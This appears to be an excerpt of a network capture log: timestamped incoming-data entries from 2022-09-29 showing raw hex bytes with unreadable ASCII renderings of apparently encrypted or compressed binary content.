                                                                                                                                                            2022-09-29 12:45:02 UTC8543INData Raw: 5e 0c a5 c4 d2 55 45 29 78 7e 83 21 39 b5 d1 cb 31 66 7a 7c e0 04 85 e9 c0 97 4e e1 67 85 d2 ff de 55 f4 df 45 40 33 03 23 82 93 58 10 68 90 5a 30 38 be f2 21 18 2e fd 30 4d c7 a1 20 ff 48 d5 5f e6 fd 82 c4 fe 0c d3 75 b6 e9 68 8c 8d a0 52 5f b5 03 10 7a 90 2c 2a 42 c8 cf 0e fb ce ed ff 9b 0f 89 f5 10 34 ed 47 7f eb e8 2f 66 b1 69 2d a0 35 50 fb fb 39 bb 88 3c 94 8f b1 14 c8 92 f4 3a 0b c4 a0 3a f9 50 c9 31 61 39 31 ce f6 0e bb ba 77 11 3a f4 e3 c4 dd 9e 8c 06 25 05 3a 2f 83 0c 1f 64 2b b4 bd f3 96 15 cf 9e 63 c2 23 d3 5a 03 d9 59 02 bd 0d 7e 27 33 79 25 ca 38 08 01 f6 c8 f7 9d 62 a1 9d f8 cc 03 ab f8 f2 0b 94 08 d9 a0 f7 2b 52 87 76 fd c8 f8 62 ff b8 96 77 54 e9 6e 9f d0 a5 e4 c2 e5 41 27 19 df 40 40 c6 b8 d2 69 86 a9 21 2b 04 ac 50 87 bf 27 f1 8b c5 65
                                                                                                                                                            Data Ascii: ^UE)x~!91fz|NgUE@3#XhZ08!.0M H_uhR_z,*B4G/fi-5P9<::P1a91w:%:/d+c#ZY~'3y%8b+RvbwTnA'@@i!+P'e
                                                                                                                                                            2022-09-29 12:45:02 UTC8559INData Raw: d7 83 28 3f d7 39 6e f6 ba ec 50 19 73 71 31 83 22 6b 5a 61 b9 f4 59 c8 bf d9 5f c8 e5 15 b1 cf c8 3d ed 8d 22 ef 26 35 2e d8 e2 cb 29 16 a7 02 cd 62 45 b4 ef 80 df 8f d6 94 8b 86 9b ce 8b 0f 35 19 03 d8 8a b2 e6 5c 18 0a b3 20 b7 c4 d8 9b 64 36 db db c6 bd db bd 9b 80 0c be 24 c9 df b8 da 2f 6f 65 fc a8 8e e4 93 10 84 ef 6c 57 3a 8c b2 46 36 17 41 ba 30 60 a3 9a 2d 37 5e 86 57 a6 e0 c7 88 00 e8 c0 18 19 44 30 6b 8c af b9 de f8 33 b3 c5 f5 86 4e 0c 2d 95 c4 84 75 04 09 29 44 d5 0a 8b fb 84 a6 37 ad 63 b9 ed a0 a7 9c df f8 ec 61 04 bb 67 96 c0 28 b5 1d 9c 74 e6 d1 74 eb 72 d1 2c d1 34 e2 25 c8 a3 0d a2 1b a5 8b be f0 a3 f0 10 36 c0 95 30 00 3f d7 f8 1f a9 bb 1c d7 74 13 99 4d 9a ec 64 d3 a4 f9 97 86 8e 50 97 27 3f a8 6e 55 39 ef 24 d1 b9 a4 af 9d 2d 48 fb
                                                                                                                                                            Data Ascii: (?9nPsq1"kZaY_="&5.)bE5\ d6$/oelW:F6A0`-7^WD0k3N-u)D7cag(ttr,4%60?tMdP'?nU9$-H
                                                                                                                                                            2022-09-29 12:45:02 UTC8575INData Raw: 6b d5 7d f6 a9 6d 61 9b 29 e5 bc a2 0f 7c af 2a fe 97 80 1f 02 4d 8b 26 8f 98 b5 de fa a8 d9 c8 ea 2a 65 42 27 01 7c e9 4e 5a 72 eb e0 9f 97 b5 ca ff 9f 1b f2 5f 85 e1 49 45 dc 0c 08 9f e1 8e d8 26 8d 1b 95 bd 75 74 50 1c 45 32 9a 50 21 81 a7 06 db 2a f1 71 d2 f7 60 8e 86 3e dd c3 a8 2c e7 f7 3f 02 db 5f 08 be e5 79 22 ba 54 33 10 72 c3 15 53 7d 88 79 65 c1 01 d2 98 ec 4a 83 83 c6 1d 7b 1d 02 3b 3d 6c 23 b5 e0 9b 96 5d 49 be a0 02 92 ef bc 76 8f 2b 2a d0 e6 f1 93 64 ca 05 14 7f af 3e 47 c0 28 67 05 cf f9 74 5a 60 37 cb 2a e5 50 97 60 37 6e ea 4c df da 99 63 60 fa 35 5f 5e 1e b7 17 dc f8 1c f3 16 55 fe 51 2b 5d 63 e9 47 6d fe d9 36 98 1c ed b3 87 8a 85 5c ee 3e 7f ef 83 86 25 63 5a 32 98 ac 6b 52 ef 84 7b 8a ca 4d ec fd 7d 11 a3 55 75 93 e6 7a 02 a6 db e3
                                                                                                                                                            Data Ascii: k}ma)|*M&*eB'|NZr_IE&utPE2P!*q`>,?_y"T3rS}yeJ{;=l#]Iv+*d>G(gtZ`7*P`7nLc`5_^UQ+]cGm6\>%cZ2kR{M}Uuz
                                                                                                                                                            2022-09-29 12:45:02 UTC8591INData Raw: ca f4 fa 3e 43 ac 33 f5 56 d4 bd 6e 68 2f 19 29 2b c1 a4 61 e1 e3 bb 71 e2 f9 84 67 c6 4c d5 12 9c 84 80 a2 88 5b 34 b3 31 0f d6 df c4 15 6b 80 bf 45 e9 b3 21 88 1c 0f 81 89 ed c7 0a 3a 4b d7 e0 ac 98 e5 12 45 ca a3 d9 85 6b 0a 83 25 8d 26 70 22 d3 43 f5 c5 ff da 59 c5 6b 0c 2e 26 96 59 7e 2f 10 4e 54 20 13 23 e2 d0 3c 94 e3 a1 75 42 c8 e1 3c 2b 1f 8d cc 64 87 a7 98 1d 1e 32 c4 cc de 80 8c c8 09 7c a4 44 82 99 62 82 ec 97 e2 7b d0 a0 3a fd 18 ee e5 e5 c1 79 ce e8 81 21 47 53 8f 5a 2d a5 ec 38 b6 7c 97 7c 87 31 4e 03 e5 52 30 e4 74 88 3c f8 1d 68 f9 23 14 ab 5c b9 20 45 81 b3 ed 1c 2c 78 8a 1e 43 06 ad ad d3 f3 c1 14 8a b2 5c d2 3c a8 5b b2 08 07 e2 17 4a 68 51 fa 6c b4 c7 4c 0e 14 f6 c3 5f 96 da cc 2e e3 1a 3d 03 08 03 06 74 49 93 6f 70 50 a3 4e 8f 18 74
                                                                                                                                                            Data Ascii: >C3Vnh/)+aqgL[41kE!:KEk%&p"CYk.&Y~/NT #<uB<+d2|Db{:y!GSZ-8||1NR0t<h#\ E,xC\<[JhQlL_.=tIopPNt
                                                                                                                                                            2022-09-29 12:45:02 UTC8607INData Raw: 84 af 14 98 37 f5 97 62 52 fd 2a 43 c7 28 66 ab 96 44 95 1d 2d c9 ae 7a 42 dd c9 b6 44 c0 69 6a 28 da dc dc fb 6a d8 47 e8 6b 2c 01 b0 4b 42 c1 ac 46 3e b8 71 7d ae f3 ad f9 ca c9 c1 1d 00 5d b5 87 bc 0d 16 9a fe 2b bc 8a c8 0a c1 e9 82 73 c5 fb 81 17 b9 20 f9 56 cf b2 4c 96 18 c2 36 68 7c f0 e6 2a e8 29 53 0d 8e ad 0d 02 e0 f9 b0 bb c1 0e f6 6e f2 2e 35 f7 a1 87 d7 af 6f fe fb cf 69 4e 3f e4 ae 72 b7 c0 0e 31 4d 63 69 87 9e da 32 de 8d 03 c0 00 20 d8 44 39 dd 53 b1 e5 ce 08 ca 33 a9 22 99 5e 40 27 05 6a 8a ac 24 75 58 aa 2e 70 19 4e 21 04 87 5c 46 f7 db 66 e1 c3 3b d0 22 1b 9b 84 bf ec f5 c6 4d 98 28 3a c4 21 cc 45 1b fa eb 55 78 eb 35 d0 81 fe b2 99 b2 09 d4 83 cd 02 8d e0 4a 2a de 3d d2 29 bb 87 ea ba dd 94 dc 72 8d 5e 3e c4 6e 46 02 cc 29 fc 1f b6 78
                                                                                                                                                            Data Ascii: 7bR*C(fD-zBDij(jGk,KBF>q}]+s VL6h|*)Sn.5oiN?r1Mci2 D9S3"^@'j$uX.pN!\Ff;"M(:!EUx5J*=)r^>nF)x
                                                                                                                                                            2022-09-29 12:45:02 UTC8623INData Raw: 78 ec 82 bf e4 db 97 7b 00 73 1f 05 cd 79 12 f0 ab 92 d6 8b 73 79 a4 d2 5a 86 d4 e2 b3 b4 d1 7a 46 73 17 6c eb 84 5a c1 78 21 c5 be 26 fa 33 ca eb 09 aa fa ed 97 a3 34 8f e1 bd e9 a4 ef 76 03 e0 2f 09 70 08 5b 4f 79 0d 41 d6 a0 5c eb 3a a7 63 df dd c9 5f 89 2a b8 35 03 aa bf d3 84 27 a8 86 fb a4 79 da 85 1f da 5f b8 37 55 8c b8 16 c6 c0 f6 51 9a 9f 47 bb a9 ae f2 75 85 2a a8 a5 e0 b1 04 97 71 74 ea 5b a0 b5 45 1a 15 95 bf 05 90 81 01 6e e0 66 64 b5 9f 17 6c 7a ea bd 9a f4 e2 0a 52 14 dd 05 ce 98 e2 9f 80 02 a6 86 e4 fe 8e 6b 6d c0 a5 cd 08 44 7a f5 e4 2e 46 92 eb e6 75 99 75 14 6f f5 2a 87 f0 c3 8e 7e e2 13 f3 f0 8b 61 1f 27 93 85 d0 af 58 64 b4 f2 04 c1 01 2f e0 f8 a9 fa c2 2a 54 22 ed 77 cf c9 c2 52 13 7b 10 4f bb d3 5e af 6c c7 e9 b5 08 dc 53 46 2d 74
                                                                                                                                                            Data Ascii: x{sysyZzFslZx!&34v/p[OyA\:c_*5'y_7UQGu*qt[EnfdlzRkmDz.Fuuo*~a'Xd/*T"wR{O^lSF-t
                                                                                                                                                            2022-09-29 12:45:02 UTC8639INData Raw: 91 78 62 5d 42 78 67 b7 b3 ce b3 31 6e 9e 0b 07 a2 49 76 e0 39 e4 6c 26 a8 6e 05 17 de 1b fd 9c 07 9d 13 b2 1e b9 d8 0c 4d a7 51 d5 1a 88 cf c2 51 1b 5f 78 1f 81 58 93 43 b9 ef 12 95 ef 44 30 73 34 9c ec 52 22 34 93 6f 69 18 50 27 eb 29 9b 40 26 ce d2 ef 19 4f 3f 2a 28 55 1f 88 d1 23 89 f7 66 70 b6 be 5e 82 8d 7d c7 5c b3 4f 99 8b 25 7f a8 2a c3 a3 b1 41 0a 8c c1 a6 ce 23 6b 94 d7 28 27 ef 7e 89 7b 9c d9 a3 76 77 38 59 f0 7d 29 8f 4b f3 99 1e 8c 82 62 73 8d 2c 62 c5 87 5f 9c f1 46 9a 9d e8 4d b0 28 e3 2a 7e 37 ca 03 da f1 21 5e fe 40 68 84 af ff af 8b 52 a1 61 7b a5 c0 f6 32 f1 1d d2 ac 7e e6 bc 92 dd 20 de 40 ee 5d a8 81 d0 57 f7 1e 9f c5 20 cf 58 f4 e3 12 d5 75 c8 ae c2 08 87 f1 20 7a c6 b0 a9 ea 6e 03 41 83 19 1f 3a 0b 43 7d 32 36 ec b3 3c 70 1e 5b 0d
                                                                                                                                                            Data Ascii: xb]Bxg1nIv9l&nMQQ_xXCD0s4R"4oiP')@&O?*(U#fp^}\O%*A#k('~{vw8Y})Kbs,b_FM(*~7!^@hRa{2~ @]W Xu znA:C}26<p[
                                                                                                                                                            2022-09-29 12:45:02 UTC8655INData Raw: d8 87 59 a7 0d 45 83 43 08 30 45 f4 2e 95 7c 33 95 f4 3a d1 be 6a 3c d8 fe 37 2d 9c 2c 28 50 74 ab 20 a2 b6 77 35 38 54 f5 63 8f 08 01 24 77 a8 18 59 6d 8d 2d bd 86 a1 ea e1 60 36 c0 45 a1 f2 d3 80 49 bb ab 7a 61 00 76 e1 ae a6 0b 0a 05 f6 5a d5 32 7e 44 32 73 d5 fe 57 2d dc a9 13 72 8d a0 b0 ad 87 a2 71 7f 6e e0 83 eb 39 cc 39 c9 16 63 a0 25 7f c3 89 f0 28 97 2c 9d 30 1a fc a6 6e d5 b3 5a 9b 21 36 f1 9f d2 7a 2a 2f 66 d1 b3 e2 c3 a9 3d 8d 28 76 27 f4 ff e4 a3 ab 15 48 62 77 a5 6b 92 11 bb 44 2d fa 4a 68 1a f2 97 2e bd 5c db 94 5d ad 75 eb 4e f2 02 ed 16 9a b5 57 49 91 b7 1a e3 cb b5 4a 0e f7 ad 29 0c 96 9f 8f a4 c6 d8 4a 0a 6a a7 c0 8d 63 52 29 99 0f 0d 27 cf 46 2a a8 3e bf 9e 99 ad 12 4b 91 c1 21 6f 2d 74 7d 2f cf f5 ab d7 86 da a8 03 76 fc 43 38 d5 f5
                                                                                                                                                            Data Ascii: YEC0E.|3:j<7-,(Pt w58Tc$wYm-`6EIzavZ2~D2sW-rqn99c%(,0nZ!6z*/f=(v'HbwkD-Jh.\]uNWIJ)JjcR)'F*>K!o-t}/vC8
                                                                                                                                                            2022-09-29 12:45:02 UTC8671INData Raw: 80 ed bd 16 9b 52 28 22 0e de 96 55 79 3e 17 cf 8b 9d bb 47 0e e6 f4 ba df da 7f 35 35 c3 0e 9b 4a 2d a3 de b9 49 4a ee 7b b3 b7 7f 6e 76 13 e0 18 f7 15 5e 4d 06 b5 15 60 f2 da e7 8d b8 ed dc 3b 65 dc 09 3d ff bc 43 2b 12 e5 70 f9 97 a4 3b 27 4b 04 89 02 fd da d5 6c 5f ec a4 81 64 0a 7d 2f 81 21 78 3c b1 16 ca 07 81 8a 1e fe 4e ad 23 bb 19 2d 2f 44 9a 45 9e 6b 99 80 31 a2 73 b1 b5 d8 95 ba b9 57 64 bd 98 15 0e 3c e8 19 f9 f7 f4 43 d6 4a d8 aa 94 95 c2 50 48 be bc 21 6f 13 b5 4b fa 1d 4d c1 0b 51 03 83 b7 90 13 4f 37 df 72 4c 2a 55 7d 35 c6 9a ab ef 2a 64 57 ec f3 9f d8 7f a5 2d 43 bf 0c 68 e4 e6 39 8b e7 fa 83 64 2c 20 27 74 9b 55 21 64 a1 53 67 28 b0 6f f4 85 dd 2a f1 98 ac ec 93 a0 02 63 97 70 68 16 aa b5 f8 3a 39 fe 40 fd e5 68 dc ad 65 37 10 fe 36 c0
                                                                                                                                                            Data Ascii: R("Uy>G55J-IJ{nv^M`;e=C+p;'Kl_d}/!x<N#-/DEk1sWd<CJPH!oKMQO7rL*U}5*dW-Ch9d, 'tU!dSg(o*cph:9@he76
                                                                                                                                                            2022-09-29 12:45:02 UTC8687INData Raw: ac c7 2b 3a 57 24 3c 8c 08 bd 81 d5 bb 97 2e 52 37 f6 60 99 ba 42 2f b9 a8 a9 35 a9 8c 8f 8e ac 32 8a 1e af 00 89 a3 00 d2 39 81 1f 79 79 ed b8 6f ff 82 c0 23 cd 2c 1f 70 97 db 0a 53 21 4d e7 83 bf 38 af 4b 67 21 54 d4 d9 08 81 fd 13 57 2a e9 8e d6 a8 8f e9 8a bb 4f cc db 22 5f cd 57 d7 02 b4 6c f7 c1 6f 33 ac 01 ce 28 2c df db 29 33 02 ac 9a 74 20 5a f8 0c da a4 3f b2 73 df 1e 4f da d3 c5 0f 7b 78 4c cd 09 ee ec 83 16 61 52 94 1b 3e 9f 19 c8 42 41 b4 d6 b9 66 e1 f8 97 91 be 11 3d 9f 43 ea aa c0 50 6d 48 a4 ae 0d 96 38 e9 ba ab 62 80 c4 42 f0 88 f2 d4 81 3f da a3 20 5e d6 64 2b 4f a1 dd be f4 c4 ee 97 76 35 2b 4c a5 b2 2c 2d d7 6e 12 a0 da 09 9e 5b 40 7c f5 c4 ff ee a0 35 56 df c6 f7 8d 9d 48 de bd 53 93 eb 2c 03 b9 97 9f e8 90 09 a6 ea 52 6a 84 67 00 1a
                                                                                                                                                            Data Ascii: +:W$<.R7`B/529yyo#,pS!M8Kg!TW*O"_Wlo3(,)3t Z?sO{xLaR>BAf=CPmH8bB? ^d+Ov5+L,-n[@|5VHS,Rjg
                                                                                                                                                            2022-09-29 12:45:02 UTC8703INData Raw: c9 31 d9 38 61 54 ec 01 c5 f7 5d c1 a3 d6 da f9 66 90 4c eb 30 47 36 9c 7c 89 61 a4 10 da ea e9 69 0c 19 8f cf 8e 89 ff 9c 7b 01 08 de a2 d8 c1 0d 86 6e 57 b2 42 66 e2 c7 14 ca 23 80 1d bc ce 94 e0 83 af 94 6d 61 6b 79 4a ad 9f 81 ce 6f 74 ca f6 22 e5 83 4e 82 63 52 78 fa 9f 43 73 7e f7 27 ed a7 cb f3 53 91 41 9a 7e 1a 80 20 e7 fd c3 bb c7 ec 07 a3 07 35 27 ad 8d 5b ea 57 48 3d 1d 25 c2 c3 88 f3 bd f2 13 c8 a3 b2 be 98 a4 e8 a2 46 5d 3b 12 82 52 50 8d 13 4e e1 7a f5 37 df 04 fe 5e d5 56 87 ec 30 6c 89 61 a5 c0 24 90 7a 8e e8 35 88 da d4 67 a8 aa bf 35 ef 0f e4 56 2f 22 e2 7d 42 a5 66 88 41 b8 3a 8c 0d 7c 59 39 12 df b3 e8 c7 25 1e 89 52 a9 8f 8d 43 03 4f 30 43 7d 87 df ea 7e e4 ed 1f 3f fe 89 2a 6b 52 0b 2e ab 96 03 63 23 95 69 51 f5 2e 23 bd 15 00 c9 10
                                                                                                                                                            Data Ascii: 18aT]fL0G6|ai{nWBf#makyJot"NcRxCs~'SA~ 5'[WH=%F];RPNz7^V0la$z5g5V/"}BfA:|Y9%RCO0C}~?*kR.c#iQ.#
                                                                                                                                                            2022-09-29 12:45:02 UTC8719INData Raw: 7b 76 aa cb 0d 40 86 6d c6 ab 25 8d 33 20 18 4f c5 48 0d 98 b7 25 5e ed 81 6e aa b7 40 ff e3 a6 94 2a 5c 2c 9a 95 91 15 c4 bf 89 ac bd a9 15 82 e0 f5 d1 12 26 20 52 f9 b4 0e 34 f5 54 8d 03 69 e9 2f 1a 98 42 80 e6 f8 8b a1 d1 83 d1 52 27 62 02 a9 e6 91 3b 22 e1 c1 27 86 30 a8 2f ae b4 e3 6f 55 82 4c f1 8b 09 4a 6c 40 26 fa 9f 4b 3d 8d c0 1c 63 d0 28 7d 08 c8 23 45 b7 b0 fd 6d f3 8f 37 55 7c 8b 14 10 33 13 b0 4e 9d 34 3d 39 64 d7 0c b7 2d 56 d9 b3 e4 8d a4 cc 6f e5 25 5d 82 a3 76 f4 5c f6 fe ff d4 6a 28 63 c9 5f c9 ef 46 7e a2 e5 42 21 b2 e0 3f cf 19 5c 49 1e 8f 0e 27 c1 c2 6c d0 0f 2d e2 70 83 24 1e 47 2e 84 87 d6 36 87 b6 b0 10 33 58 c2 7f 1c 4d 8b 0e dd fd 84 a3 b6 fc d1 a2 ce 8b ba ad a7 08 9c 9c 48 2a 56 f4 e8 c7 75 96 21 d9 c1 b0 6e ec 1e 4b d6 7d 67
                                                                                                                                                            Data Ascii: {v@m%3 OH%^n@*\,& R4Ti/BR'b;"'0/oULJl@&K=c(}#Em7U|3N4=9d-Vo%]v\j(c_F~B!?\I'l-p$G.63XMH*Vu!nK}g
                                                                                                                                                            2022-09-29 12:45:02 UTC8735INData Raw: e3 8d d4 23 5c 3b c8 f6 f3 a5 90 7e 51 7c df ca 2e cd 58 47 0d 56 88 34 18 f9 6b fa 05 b2 b1 71 ab be a2 33 fc 5b 4d bb b1 6e b4 bb 9b c2 f9 7d 93 c4 06 3a 6b 46 b2 91 56 7b ef bc 89 d4 3f 2e 04 f0 b3 24 e1 c7 95 8f 98 e7 96 33 4b e6 58 29 6e 35 70 1a 6d 44 0b d3 76 8e 9e 41 2a 61 43 46 f8 92 9d e5 40 87 a8 88 3d e8 94 b1 ca 23 4f 53 ca c4 fb f9 d8 29 d9 be 0e ca c1 77 d3 6f 63 11 03 5d da 79 1f 78 e6 85 ef 9e 90 33 57 dd 5d c9 b6 d1 41 5b 68 c9 35 25 a1 53 cd a2 d5 08 bc 30 85 c0 45 fb 16 68 a8 34 ce 1d d9 61 17 de 6b b7 e1 29 18 ac 17 ad 09 45 47 43 53 10 24 4f 8a cd 65 34 ab 33 e2 e5 09 23 66 21 fe d9 53 1b e9 85 63 da 0a 32 0c 62 da f3 d1 8b bc 58 f4 b9 44 b3 68 20 de aa 20 f9 26 90 4f 21 b4 79 26 cf b3 80 68 18 3d dc c1 ab a1 93 79 aa 67 f7 c9 b0 58
                                                                                                                                                            Data Ascii: #\;~Q|.XGV4kq3[Mn}:kFV{?.$3KX)n5pmDvA*aCF@=#OS)woc]yx3W]A[h5%S0Eh4ak)EGCS$Oe43#f!Sc2bXDh &O!y&h=ygX
                                                                                                                                                            2022-09-29 12:45:02 UTC8745INData Raw: 15 3a 03 8d f1 a0 a5 01 a1 16 0d 92 17 23 1b e9 a4 3c 02 76 62 63 6f ce 89 24 a1 bf f0 dd e6 b1 e2 51 fe 40 79 7f 93 b2 9b 85 f0 8f 4c 13 2f df 9c fe 0e f7 45 b4 43 4d 02 c0 02 7a 27 0a 61 d5 fd 1c 64 28 ca 04 46 a7 eb bb f2 d7 79 21 43 88 6f ec 3f 37 64 e1 81 9a 58 c0 50 25 bf 9d 0a 9c a4 2c 68 0b 69 5b e6 08 b3 71 b9 46 29 fd 27 c9 b5 3f e4 c1 a3 ab c7 2f 57 0e 74 b7 0f a8 6f 02 5e 19 24 89 59 83 41 41 ae dc 56 11 ed 9c ff 74 a0 3d 52 37 02 11 8c 21 c3 3d 00 54 cd fe d1 f4 94 af c9 73 64 74 bd cf e3 b3 d5 3e 17 00 b9 ec f9 25 57 3c c9 67 c4 d3 a7 be d3 e6 58 69 79 b0 22 a8 81 2d fc eb 38 61 2d 42 48 08 e9 23 12 f4 c7 89 0b 59 cd 9e 52 1f 12 6e 5d 1d e7 2e d0 15 88 cb 9e 38 a0 b5 06 f0 53 49 e5 47 94 08 5f 7f da 8c 8d d4 ee bd c1 d4 4c 68 f4 8b 95 2f 56
                                                                                                                                                            Data Ascii: :#<vbco$Q@yL/ECMz'ad(Fy!Co?7dXP%,hi[qF)'?/Wto^$YAAVt=R7!=Tsdt>%W<gXiy"-8a-BH#YRn].8SIG_Lh/V
                                                                                                                                                            2022-09-29 12:45:02 UTC8761INData Raw: 0b cc 57 b0 76 80 35 c6 2f c0 3e dd 07 29 f4 76 c4 7a dc b7 2e 14 6f bb af b1 69 9c 3e 9d 67 e3 2a 94 22 27 89 5c 30 a3 83 e4 b7 b3 3f 3a e2 86 27 17 ca 3f 28 5f 04 c2 64 a2 fd 83 1d 9e 36 4d 16 ef 4b d5 68 c5 69 28 58 57 94 cd 5b 84 de 61 18 40 2c 82 15 db 62 5e 48 af 63 da 87 8f 6b e4 b7 a0 ef 31 4d 03 da fb b6 24 53 43 e2 53 d4 0e 03 cb b3 50 60 27 aa 4e 26 f9 78 51 2b a3 b0 e9 2a 3f a9 47 3d 1d 9d c5 0d d5 c1 1b 4b 25 ba 6e e7 fd 61 31 cc 81 34 84 c1 11 d1 46 9d bc 30 0c b2 e2 00 7e d3 cd b4 48 c7 51 d1 43 3f 5d d7 3a 54 ea 55 b1 60 e8 b4 27 2a e6 0d 9d 4a 84 ad bc fa 73 ea b6 48 65 86 a2 8a 79 b7 2e 71 dc 12 53 ba 61 ff 9a 63 e0 c6 14 f0 ef 26 8e bb dc 2d 84 c8 70 7f 4e 9e 38 c2 87 4f 44 55 73 ed 27 e3 e0 cd 52 8a 26 1b e7 d5 39 a4 6a c0 21 78 cc 40
                                                                                                                                                            Data Ascii: Wv5/>)vz.oi>g*"'\0?:'?(_d6MKhi(XW[a@,b^Hck1M$SCSP`'N&xQ+*?G=K%na14F0~HQC?]:TU`'*JsHey.qSac&-pN8ODUs'R&9j!x@
                                                                                                                                                            2022-09-29 12:45:02 UTC8777INData Raw: 85 42 2c 4b c1 41 22 bc 32 6c cc 1e 82 73 81 ee d4 8b da 94 d0 e5 6a d9 01 3a 74 89 7d 1b 32 48 70 19 cd d8 e9 fc fe f8 49 02 f1 ee ba 7e 79 da 3e e9 2c 71 cc c7 7e 72 ca 1d 3f 7b fb 4c 3a c5 83 79 f8 4b 95 43 1d 7a f3 d2 b7 ef ec 77 53 0a c6 8c 84 73 33 15 91 f1 6c 02 74 03 7e d0 17 49 db 3b fd 0e b5 41 fb d9 c0 fa 87 b3 14 30 67 b5 96 b5 11 9c 30 23 44 97 75 9d 5e d7 a4 c1 c4 f1 36 39 0e b2 16 88 d7 ec 75 6f 6a 00 7a d4 b4 d7 5b d1 0d 89 05 a6 b2 08 98 c6 57 b2 b1 42 72 57 3b 8f d7 50 6f ad cc b6 4e d6 95 a8 79 29 4f b6 29 d9 8c 9d f2 1c 8d 3f 7b 1b 07 39 2f 8a 2d a8 5d 89 d9 eb a4 e6 d4 82 01 42 eb 3e c9 22 8d 5f a1 15 52 69 21 25 0f 2e 5b 38 e6 4d ab b9 be 05 19 38 2b c7 0b 26 c5 61 99 2d 8f 84 62 6c 62 75 d8 64 c3 97 d6 18 1e a0 0f ff f6 8b 76 42 dc
                                                                                                                                                            Data Ascii: B,KA"2lsj:t}2HpI~y>,q~r?{L:yKCzwSs3lt~I;A0g0#Du^69uojz[WBrW;PoNy)O)?{9/-]B>"_Ri!%.[8M8+&a-blbudvB
                                                                                                                                                            2022-09-29 12:45:02 UTC8793INData Raw: c1 74 f3 02 f8 2f 00 42 3a b8 27 8b 18 57 c2 87 1f 6f e3 a4 2d a9 fb 69 9e ce 36 56 07 6d 9b 53 ef 93 2c 6f f9 a0 32 f9 6d a3 d5 4b c6 25 5a 27 d3 4b 28 92 18 fc 3c bf ae cb 89 1c 9d 26 3a 7f b5 97 6d 37 09 b4 84 97 6d f7 a1 b8 01 f7 80 c5 53 6c 2d d9 2a ab 6e f9 c3 91 e3 3c 1c 49 ea bf 28 d0 07 90 bc d8 1a 7e 18 31 31 f1 88 c4 2e 0c f5 82 8d b7 a9 0d 97 16 39 ca 88 89 fd ad 14 4a 75 e5 06 65 44 12 cd 6d dd 51 40 7e d6 12 cd 82 6c 7f d8 45 5d a9 cf 7d 77 b6 7e d5 51 e8 62 dd d8 1d 16 e6 19 63 8e ac 6a 88 b9 a9 51 69 8d 9d a4 03 7f a7 8d 6e 49 ad 3a 93 be e4 c8 16 43 df 2a 63 59 6e 47 55 85 c2 a8 1a 36 4d cf 32 59 35 6d 4d 6e 3f 38 0e 8d 61 9b 8b 20 2f 31 1f 62 d6 38 75 f4 92 43 56 d3 a4 4e a5 cb 26 18 ba 17 a9 70 5d 19 e4 32 dd 8d 44 27 52 2e 91 c6 20 66
                                                                                                                                                            Data Ascii: t/B:'Wo-i6VmS,o2mK%Z'K(<&:m7mSl-*n<I(~11.9JueDmQ@~lE]}w~QbcjQinI:C*cYnGU6M2Y5mMn?8a /1b8uCVN&p]2D'R. f
                                                                                                                                                            2022-09-29 12:45:02 UTC8809INData Raw: cf b9 67 74 5f d5 28 b1 fc 9e 7a 7c ab 87 ea 87 c6 81 4b b2 3c d7 84 85 25 9a 7b 95 3a a2 ef a5 7d 84 d6 aa 3f f1 e5 e1 12 b6 6e fe 4d bc 8f 5d 76 75 01 bb 69 d2 d2 34 1b 09 49 5e 97 a5 34 0c fe ce c6 67 59 9b b2 41 90 bf 8c 94 c8 ec f2 8b 58 fd 45 84 80 e7 30 70 36 ca 29 b6 5b 63 39 d1 35 3e 39 3f a2 33 9c 47 74 e4 5d 31 c4 b6 75 a7 e8 55 52 4a 5e 80 25 cb 14 f5 96 f0 93 b4 f6 48 91 9d a3 35 5a 6b 02 f2 82 f8 9e 00 ed 24 72 5c 5a cb 13 b6 57 8b b8 73 b9 41 40 f2 eb 0f 83 54 31 b9 8c f2 d9 29 f7 8a c6 40 34 83 3a 2e 2e d5 0e be 3a fb 98 b7 71 5f 83 5b f4 24 05 e9 07 1c d1 61 c1 33 9f ff de e4 06 c0 be 9a 65 c9 83 08 da d6 7b f0 15 60 68 f4 36 2a 70 7a 66 35 79 45 3b 75 38 c5 05 0b 45 73 d2 87 db 82 c6 0e c2 b0 5a 91 5e e3 b6 c7 07 2a ff 43 55 ec 2c bf 05
                                                                                                                                                            Data Ascii: gt_(z|K<%{:}?nM]vui4I^4gYAXE0p6)[c95>9?3Gt]1uURJ^%H5Zk$r\ZWsA@T1)@4:..:q_[$a3e{`h6*pzf5yE;u8EsZ^*CU,
                                                                                                                                                            2022-09-29 12:45:02 UTC8825INData Raw: 10 f5 eb 49 2c 61 5d 82 19 0d 95 31 49 03 33 3f 2c c6 af af 9d 5c 37 dd d9 4c 68 02 6a d6 97 24 ec 55 51 8a 91 fb 69 d2 f0 26 b0 42 d3 35 3c da e7 21 75 bc b7 c8 b1 d9 e0 7b 25 c2 6a 1c d7 83 b0 a9 b9 8f fc 4c 53 17 5d aa 56 ec 2e cb 5b 07 26 06 ef 18 92 9b ca 31 ba 33 56 33 4b 83 7c 0b c5 b3 0a a0 59 ea b7 02 b5 fe 55 47 bc 05 e8 eb 9d db 28 aa bb 00 9b 3b 32 87 a9 35 b5 0c dc 84 14 cf 28 07 d7 18 c5 c8 0f 82 e2 e0 35 96 6b a9 1f ee 97 10 43 c9 cb 42 2c f0 08 6f e6 e6 d3 f7 80 2e da c0 73 b3 87 75 fc 38 9b 5f cf e7 db c8 16 38 2a ca 10 6f ba e3 06 aa 4d 4e 3a 54 b2 f1 7c 68 ff 48 12 78 31 b9 a7 63 31 0a 90 64 a4 90 9f 1d f8 92 1f e8 13 bf 70 a5 56 dc c1 ee 50 78 13 61 a9 9d 1d 2c 1a ef 6d 40 03 ac d2 fa 16 1c d2 fa a4 fd ee 5a 1c bd 77 72 c0 c8 9b 32 e0
                                                                                                                                                            Data Ascii: I,a]1I3?,\7Lhj$UQi&B5<!u{%jLS]V.[&13V3K|YUG(;25(5kCB,o.su8_8*oMN:T|hHx1c1dpVPxa,m@Zwr2
